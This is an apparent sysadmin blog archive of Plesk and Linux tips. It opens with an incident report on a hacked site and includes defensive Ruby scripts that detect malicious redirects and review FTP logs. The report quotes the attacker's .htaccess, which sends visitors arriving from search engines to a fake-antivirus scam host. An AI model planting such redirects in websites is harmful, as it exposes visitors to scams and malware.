March 16th, 2009 — Plesk, Security
Today the website of one of our clients was blacklisted by Google for containing malicious software that downloads and installs itself without the user's consent. Google displayed "This site may harm your computer" under the website in its results page.
Analyzing the site's sources we found obfuscated JavaScript code inserted near the body and html tags in .html, .php and .tpl files, and a .htaccess file with the following content:
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR]^M
RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR]^M
RewriteCond %{HTTP_REFERER} .*ya.*$ [NC]
RewriteRule .* http://real-antispyware.info/0/go.php?sid=2 [R,L]
Hmm, visitors arriving from search engines were redirected to real-antispyware.info. This website is a scam that shows a JavaScript animation fooling the user with a message that his computer is infected, and prompts him to download and install a fake AntiVirus. Visitors who type the address directly (no search-engine referrer) see the normal site, which is why the client did not notice anything.
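As an added example (my own code, not part of the original post), here is a small Ruby checker for the pattern shown above: a run of RewriteCond lines on HTTP_REFERER that match search-engine names, followed by a RewriteRule that redirects to a host you do not own. The search-engine words come from the .htaccess above; the own_hosts list, the scan_htaccess_files helper and the two sample .htaccess bodies are constructed for the example.

```ruby
require 'uri'

# Search-engine names seen in the malicious .htaccess above.
SEARCH_ENGINE_WORDS = %w[google aol msn yahoo yandex rambler ya].freeze

# Returns an array of findings for one .htaccess body; empty means clean.
# own_hosts: hostnames that legitimately belong to the site (assumption).
def referrer_redirect_findings(htaccess_text, own_hosts)
  own = own_hosts.map(&:downcase)
  findings = []
  referer_conds = 0            # search-engine referrer conditions pending
  htaccess_text.each_line.with_index(1) do |raw, lineno|
    line = raw.strip           # strip also drops stray CR (^M) characters
    next if line.empty? || line.start_with?('#')
    if line =~ /\ARewriteCond\s+%\{HTTP_REFERER\}\s+(\S+)/i
      pattern = $1.downcase
      referer_conds += 1 if SEARCH_ENGINE_WORDS.any? { |w| pattern.include?(w) }
    elsif line =~ %r{\ARewriteRule\s+\S+\s+(https?://\S+)}i
      target = $1
      host = (URI.parse(target).host rescue nil)
      external = host && !own.include?(host.downcase)
      if referer_conds > 0 && external
        findings << { line: lineno, target: target, host: host, conditions: referer_conds }
      end
      referer_conds = 0        # a RewriteRule consumes the conditions before it
    end
  end
  findings
end

# Walks a document root and reports every .htaccess with the pattern.
def scan_htaccess_files(root, own_hosts)
  Dir.glob(File.join(root, '**', '.htaccess')).each_with_object({}) do |path, out|
    f = referrer_redirect_findings(File.read(path), own_hosts)
    out[path] = f unless f.empty?
  end
end

# Constructed sample: the redirect from the post (with CRLF on one line).
MALICIOUS_HTACCESS = "RewriteEngine On\n" \
  "RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]\r\n" \
  "RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]\n" \
  "RewriteRule .* http://real-antispyware.info/0/go.php?sid=2 [R,L]\n"

# Constructed sample: a legitimate hotlink-protection rule on the site's own host.
CLEAN_HTACCESS = "RewriteEngine On\n" \
  "RewriteCond %{HTTP_REFERER} !^https?://(www\\.)?example\\.com/ [NC]\n" \
  "RewriteRule \\.(jpg|png)$ http://www.example.com/hotlink.png [R,L]\n"

if __FILE__ == $0
  referrer_redirect_findings(MALICIOUS_HTACCESS, %w[example.com www.example.com]).each do |f|
    puts "line #{f[:line]}: #{f[:conditions]} search-engine referrer condition(s) -> #{f[:target]}"
  end
end
```

Run it against a vhost with scan_htaccess_files('/var/www/vhosts/example.com/httpdocs', %w[example.com www.example.com]); a site-owned redirect target produces no finding, only redirects to foreign hosts gated on search-engine referrers do.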
Analyzing the IP addresses in the ftp logs we found connections from Russia and China that altered the client's website. Somehow they got the user's ftp password (it can be done in so many ways: weak password, traffic sniffing, virus, keylogger, trojan, ...) and they altered the website files.
You can use this simple Ruby script to analyze your ftp logs. By default it is configured for a Plesk server, and it will show the suspicious lines (change the IGNORE variables to fit your needs). You may need to install rubygems and the geoip gem.
#!/usr/bin/ruby
require 'rubygems'
require 'geoip'
require 'zlib'

# hide log lines from these countries (ISO two-letter codes)
# Example: RO US
IGNORE_COUNTRIES = %w{RO US}

# the free geoip database is not 100% accurate,
# so we may need to ignore a few ip addresses explicitly
IGNORE_IP = %w{127.0.0.1 127.0.0.2}

# Plesk keeps the ftp transfer logs here; rotated copies are gzipped
files = Dir.glob("/usr/local/psa/var/log/xferlog*")
geoip = GeoIP.new('/var/lib/GeoIP/GeoIP.dat')

# returns the two-letter country code for an ip, or nil if unknown
def ip2country(geoip, ip)
  record = geoip.country(ip)
  record ? record[3] : nil
end

ip_list = []
files.each do |filename|
  puts ""
  puts "Processing #{filename} ..."
  File.open(filename) do |f|
    input = f
    input = Zlib::GzipReader.new(f) if File.extname(filename) == ".gz"
    while line = input.gets do
      # xferlog format: the remote host is the 7th whitespace-separated field
      ip = line.split(/\s+/)[6]
      next if ip.nil?
      unless ip_list.include? ip
        country = ip2country(geoip, ip) || "??"
        unless IGNORE_COUNTRIES.include? country.upcase or IGNORE_IP.include? ip
          puts " [#{country} : #{ip}] => #{line}"
        end
        ip_list << ip
      end
    end
  end
end
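The script above only looks at where connections came from. As an added example (my own code, not the post's script), the following Ruby parser looks at what was done: it splits xferlog lines into their fields and flags completed uploads of web files (.htaccess, .php, .html, .tpl, plus .js) from addresses outside a trusted network list. The trusted networks, the 203.0.113.x address and the sample log lines are constructed for the example; the field layout is the standard xferlog format.

```ruby
require 'ipaddr'
require 'zlib'

# Assumption: networks your own staff uploads from. Adjust for your site.
TRUSTED_NETS = %w[192.168.0.0/24 10.0.0.0/8].map { |n| IPAddr.new(n) }

# File types the attackers in the post modified, plus JavaScript.
WEB_FILE_RE = %r{(\A|/)\.htaccess\z|\.(php|html?|tpl|js)\z}i

# xferlog fields (whitespace separated):
#   0-4 date/time   5 transfer-time   6 remote-host   7 size   8 filename
#   9 transfer-type 10 special-action 11 direction (i=upload, o=download, d=delete)
#   12 access-mode  13 username       14 service      15 auth-method
#   16 auth-user    17 completion-status (c=complete, i=incomplete)
XferEntry = Struct.new(:time, :host, :filename, :direction, :user, :status)

# Returns an XferEntry, or nil for lines without the expected 18 fields.
# Caveat: a filename containing spaces shifts the fields; such lines are skipped.
def parse_xferlog_line(line)
  f = line.strip.split(/\s+/)
  return nil unless f.size == 18
  XferEntry.new(f[0..4].join(' '), f[6], f[8], f[11], f[13], f[17])
end

# Only literal addresses inside TRUSTED_NETS count as trusted.
def trusted_host?(host)
  ip = (IPAddr.new(host) rescue nil)
  return false if ip.nil?
  TRUSTED_NETS.any? { |net| net.include?(ip) }
end

# Completed uploads of web files from untrusted addresses.
def suspicious_uploads(lines)
  lines.map { |l| parse_xferlog_line(l) }.compact.select do |e|
    e.direction == 'i' && e.status == 'c' &&
      e.filename =~ WEB_FILE_RE && !trusted_host?(e.host)
  end
end

# Reads a plain or gzipped xferlog, as Plesk rotates them.
def read_xferlog(path)
  File.open(path, 'rb') do |f|
    io = path.end_with?('.gz') ? Zlib::GzipReader.new(f) : f
    io.readlines
  end
end

# Constructed sample log: two uploads from an outside address, one from the
# office network, and one download that should not be flagged.
SAMPLE_XFERLOG = <<'EOS'
Mon Mar 16 02:14:07 2009 1 203.0.113.45 512 /var/www/vhosts/example.com/httpdocs/.htaccess a _ i r example ftp 0 * c
Mon Mar 16 02:14:09 2009 1 203.0.113.45 2048 /var/www/vhosts/example.com/httpdocs/index.php a _ i r example ftp 0 * c
Mon Mar 16 09:30:00 2009 1 192.168.0.15 4096 /var/www/vhosts/example.com/httpdocs/about.html a _ i r example ftp 0 * c
Mon Mar 16 09:31:00 2009 3 203.0.113.45 81920 /var/www/vhosts/example.com/httpdocs/images/logo.png b _ o r example ftp 0 * c
EOS

if __FILE__ == $0
  lines = ARGV.empty? ? SAMPLE_XFERLOG.lines : ARGV.flat_map { |p| read_xferlog(p) }
  suspicious_uploads(lines).each do |e|
    puts "#{e.time} #{e.host} user=#{e.user} uploaded #{e.filename}"
  end
end
```

Pass the log paths as arguments (for example /usr/local/psa/var/log/xferlog*) to run it against a real server; without arguments it processes the constructed sample.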
Steps that need to be followed:
- Change FTP password
- Upload a clean copy from the backups of the website
- Submit the website in the Webmaster’s Tools for reconsideration
- Audit your company security: computers, firewalls, antiviruses, software, …
You may also find Google's diagnostic tool useful (replace example.com with your domain):
http://www.google.com/safebrowsing/diagnostic?site=http://example.com
February 8th, 2009 — Linux, Plesk
SMTP stands for Simple Mail Transfer Protocol. It was designed a long time ago, when the Internet was a peaceful place. Today we are facing new challenges, so there should be new solutions.
One of the problems is spam: spammers keep bombarding us every day with junk mail. We invented black and white lists to protect ourselves from them.
If your clients connect from an ip address that is listed in an RBL (not uncommon for ISPs that use dynamic ip addresses), they can't send messages through your server if you are using RBLs.
Disabling the RBL checks is not an option, so we'll configure an alternative relay port, 1025, for the clients whose addresses are listed in RBLs.
You can just copy your smtp_psa file and customize it:
cd /etc/xinetd.d/
cp smtp_psa smtp_alt_psa
vim smtp_alt_psa
You need to change the service name from smtp to smtp-alt and remove the rblsmtpd command and its -r parameters; finally it should look something like this:
# /etc/xinetd.d/smtp_alt_psa
service smtp-alt
{
    socket_type = stream
    protocol    = tcp
    wait        = no
    disable     = no
    user        = root
    instances   = UNLIMITED
    server      = /var/qmail/bin/tcp-env
    server_args = -Rt0 /var/qmail/bin/relaylock /var/qmail/bin/qmail-smtpd /var/qmail/bin/smtp_auth /var/qmail/bin/true /var/qmail/bin/cmd5checkpw /var/qmail/bin/true
}
Append the new service to /etc/services:
smtp-alt 1025/tcp
smtp-alt 1025/udp
And restart the xinetd service:
[root@sirius xinetd.d]# /etc/init.d/xinetd restart
Stopping xinetd: [ OK ]
Starting xinetd: [ OK ]
Verify your configuration with telnet command:
[root@sirius xinetd.d]# telnet localhost 1025
Trying 127.0.0.1...
Connected to localhost.localdomain (127.0.0.1).
Escape character is '^]'.
220 sirius.example.net ESMTP
# Ctrl+] and then quit to exit telnet
Now, instruct your clients to change the port in their SMTP settings from 25 to 1025; they will be able to send mail through your server even though you are using RBL lists.
January 16th, 2009 — Linux
FreeImage is not yet available as an RPM on CentOS/RHEL, so we'll create one.
Before installing the libraries required by FreeImage, configure yum to use Dag's repositories; see this post for how it can be done.
Learn how to set up your account to build RPMs as a non-privileged user:
http://www.cherpec.com/2009/01/build-rpms-as-simple-user/
[root@lynx ~] yum install libjpeg-devel libpng-devel libtiff-devel libmng-devel openexr-devel zlib-devel
[...]
Next, download the following files from FreeImage's website and put them in your SOURCES directory:
Then download freeimage.spec and place it in the SPECS directory.
Now you are ready to build FreeImage: switch to the SPECS directory and build the package:
[joe@lynx SPECS]$ rpmbuild -ba freeimage.spec
[...]
+ umask 022
+ cd /home/joe/rpmbuild/BUILD
+ cd FreeImage
+ DOCDIR=/home/joe/rpmbuild/tmp/freeimage-3.11.0-buildroot/usr/share/doc/freeimage-3.11.0
+ export DOCDIR
+ rm -rf /home/joe/rpmbuild/tmp/freeimage-3.11.0-buildroot/usr/share/doc/freeimage-3.11.0
+ /bin/mkdir -p /home/joe/rpmbuild/tmp/freeimage-3.11.0-buildroot/usr/share/doc/freeimage-3.11.0
+ cp -pr FreeImage3110.pdf /home/joe/rpmbuild/tmp/freeimage-3.11.0-buildroot/usr/share/doc/freeimage-3.11.0
+ exit 0
Provides: libfreeimage.so.3()(64bit)
Requires(rpmlib): rpmlib(CompressedFileNames) <= 3.0.4-1 rpmlib(PayloadFilesHavePrefix) <= 4.0-1
Requires: libc.so.6()(64bit) libc.so.6(GLIBC_2.2.5)(64bit) libc.so.6(GLIBC_2.3)(64bit) libgcc_s.so.1()(64bit) libgcc_s.so.1(GCC_3.0)(64bit) libstdc++.so.6()(64bit) libstdc++.so.
Processing files: freeimage-debuginfo-3.11.0-1
Checking for unpackaged file(s): /usr/lib/rpm/check-files /home/joe/rpmbuild/tmp/freeimage-3.11.0-buildroot
Wrote: /home/joe/rpmbuild/SRPMS/freeimage-3.11.0-1.src.rpm
Wrote: /home/joe/rpmbuild/RPMS/x86_64/freeimage-3.11.0-1.x86_64.rpm
Wrote: /home/joe/rpmbuild/RPMS/x86_64/freeimage-debuginfo-3.11.0-1.x86_64.rpm
January 16th, 2009 — Linux
It's not recommended to build your RPMs as root. You can build them as a simple user; to accomplish this, you need to create a file called .rpmmacros in your home directory (we'll assume that your user name is joe and your home directory is /home/joe):
# ~/.rpmmacros
%_topdir /home/joe/rpmbuild
%_tmppath %{_topdir}/tmp
Then create required directories:
[joe@lynx ~]$ mkdir -p ~/rpmbuild/{BUILD,RPMS/{noarch,i386,i586,i686,x86_64},SOURCES,SPECS,SRPMS,tmp}
You are ready to build your RPMs as a simple user.
January 4th, 2009 — Linux, Plesk
Sometimes you need to rebuild all your httpd.include files; it can be done with the websrvmng command:
/usr/local/psa/admin/bin/websrvmng -av
December 23rd, 2008 — Linux, Shell
rename is a handy command from the util-linux package for when you need to rename multiple files. From the manual:
NAME
rename - Rename files
SYNOPSIS
rename from to file...
DESCRIPTION
rename will rename the specified files
by replacing the first occurrence of
from in their name by to.
...
Example usage:
[vitalie@silver london]$ ls -1
DSC00967.JPG
DSC00968.JPG
DSC00969.JPG
DSC00970.JPG
DSC00971.JPG
[vitalie@silver london]$ rename DSC00 london_ *.JPG
[vitalie@silver london]$ ls -1
london_967.JPG
london_968.JPG
london_969.JPG
london_970.JPG
london_971.JPG
December 23rd, 2008 — Linux, Plesk
If your server allows recursive queries from anywhere, it can be abused by malicious users (open resolvers are used, for example, in DNS amplification attacks). Recursion should be restricted to ip addresses from your local nets only.
To accomplish this, edit your /etc/named.conf and specify in the "options" section which ACLs are allowed to run recursive queries, using the allow-recursion option:
# /etc/named.conf
acl localnets { 127.0.0.1; 192.168.0.0/24; };
options {
    ...
    allow-recursion { localnets; };
    ...
};
Then restart the bind server:
[root@red ~]# /etc/init.d/named restart
Stopping named: . [ OK ]
Starting named: [ OK ]
In Plesk it can be done from the Control Panel:
Server->DNS Settings->DNS Preferences->Allow recursion
and choose localhost or localnets.
November 21st, 2008 — Linux
Open your /etc/modprobe.conf file and append:
# Turn off IPv6
alias net-pf-10 off
alias ipv6 off
Then restart your server.
November 17th, 2008 — Linux
A lame server is when an NS record for a domain specifies a server which is not authoritative for that domain.
To keep your logs (/var/log/messages) clean of lame server messages like these:
[...]
Nov 16 15:10:50 srv named[99]: lame server resolving 'abc.com' (in 'abc.com'?): 1.2.3.4#53
Nov 16 15:10:50 srv named[99]: lame server resolving 'abc.com' (in 'abc.com'?): 1.2.3.4#53
Nov 16 15:10:50 srv named[99]: lame server resolving 'abc.com' (in 'abc.com'?): 1.2.3.4#53
Nov 16 15:10:50 srv named[99]: lame server resolving 'abc.com' (in 'abc.com'?): 1.2.3.4#53
Nov 16 19:43:25 srv named[99]: lame server resolving 'abc.com' (in 'abc.com'?): 1.2.3.4#53
Nov 16 19:43:25 srv named[99]: lame server resolving 'abc.com' (in 'abc.com'?): 1.2.3.4#53
[...]
Edit your /etc/named.conf and add:
logging {
    category lame-servers { null; };
};
Then restart the bind daemon.
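Before sending the whole category to null, it is worth knowing which zones and which upstream servers are behind the noise, in case one of them is a domain you host or delegate yourself. As an added example (my own code, not from the original post), this Ruby snippet summarises lame-server lines from /var/log/messages by zone and server. The sample lines reuse the ones shown above plus two constructed lines for a second zone (198.51.100.7 is a documentation address).

```ruby
# Matches: named[PID]: lame server resolving 'NAME' (in 'ZONE'?): IP#PORT
LAME_RE = /named\[\d+\]: lame server resolving '([^']+)' \(in '([^']+)'\?\): ([^#\s]+)#(\d+)/

# Returns [{zone:, server:, count:}, ...], most frequent first.
def lame_server_summary(lines)
  counts = Hash.new(0)
  lines.each do |line|
    m = LAME_RE.match(line) or next      # skip unrelated syslog lines
    _name, zone, server, port = m.captures
    counts[[zone, "#{server}:#{port}"]] += 1
  end
  counts.map { |(zone, server), n| { zone: zone, server: server, count: n } }
        .sort_by { |h| [-h[:count], h[:zone]] }
end

# Constructed sample: the six lines from the post and two for another zone.
SAMPLE_MESSAGES = <<'EOS'
Nov 16 15:10:50 srv named[99]: lame server resolving 'abc.com' (in 'abc.com'?): 1.2.3.4#53
Nov 16 15:10:50 srv named[99]: lame server resolving 'abc.com' (in 'abc.com'?): 1.2.3.4#53
Nov 16 15:10:50 srv named[99]: lame server resolving 'abc.com' (in 'abc.com'?): 1.2.3.4#53
Nov 16 15:10:50 srv named[99]: lame server resolving 'abc.com' (in 'abc.com'?): 1.2.3.4#53
Nov 16 19:43:25 srv named[99]: lame server resolving 'abc.com' (in 'abc.com'?): 1.2.3.4#53
Nov 16 19:43:25 srv named[99]: lame server resolving 'abc.com' (in 'abc.com'?): 1.2.3.4#53
Nov 17 08:02:11 srv named[99]: lame server resolving 'www.example.org' (in 'example.org'?): 198.51.100.7#53
Nov 17 08:02:12 srv named[99]: lame server resolving 'www.example.org' (in 'example.org'?): 198.51.100.7#53
Nov 17 08:02:13 srv sshd[120]: Accepted publickey for joe from 192.168.0.15 port 4022 ssh2
EOS

if __FILE__ == $0
  lines = ARGV.empty? ? SAMPLE_MESSAGES.lines : ARGV.flat_map { |p| File.readlines(p) }
  lame_server_summary(lines).each do |h|
    puts "#{h[:count].to_s.rjust(6)}  #{h[:zone]}  via #{h[:server]}"
  end
end
```

Run it as ruby lame.rb /var/log/messages on a real server; with no arguments it summarises the constructed sample.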
October 24th, 2008 — Linux, Plesk
To enable AntiVirus for all accounts in Plesk you can use the following script:
#!/bin/bash
mysql -uadmin -p`cat /etc/psa/.psa.shadow` psa<<-EOT
UPDATE mail
SET virusfilter = 'any'
WHERE postbox = 'true' AND virusfilter != 'any'
EOT
You can run it daily from cron to keep your mailboxes protected.